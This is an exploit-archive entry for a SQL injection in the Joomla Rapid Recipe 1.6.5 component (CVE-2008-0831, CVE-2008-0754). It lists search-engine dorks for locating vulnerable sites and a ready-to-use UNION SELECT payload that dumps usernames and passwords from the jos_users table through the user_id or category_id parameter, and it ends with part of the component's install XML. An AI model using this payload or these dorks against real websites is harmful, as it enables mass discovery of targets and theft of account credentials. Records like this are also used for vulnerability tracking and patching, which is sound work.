Joomla! Component Rapid Recipe 1.6.5 - SQL Injection
Author: S@BUN
type: webapps
platform: php
port:
date_added: 2008-02-11
date_updated: 2016-12-05
verified: 1
codes: OSVDB-41481;CVE-2008-0831;CVE-2008-0754
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
#
# joomla SQL Injection(com_rapidrecipe)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl: "com_rapidrecipe"user_id
#
# DORK 2 : allinurl: "com_rapidrecipe" category_id
#
#########################################################################
EXPLOIT :
after user_id or catogry_id add exploit
-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
#########################################################################
# S@BUN i AM NOT HACKER S@BUN
#########################################################################
<mosinstall type="component">
<name>rapidrecipe</name>
<creationDate>30/7/2007</creationDate>
<author>Konstantinos Kokkorogiannis</author>
<copyright>This component in released under the Chefs and Koyans License. You should not use it unless you have bought it.</copyright>
<authorEmail>koyan@dianthos.net</authorEmail>
<authorUrl>www.dianthos.net</authorUrl>
<version>1.6.5</version>
# milw0rm.com [2008-02-12]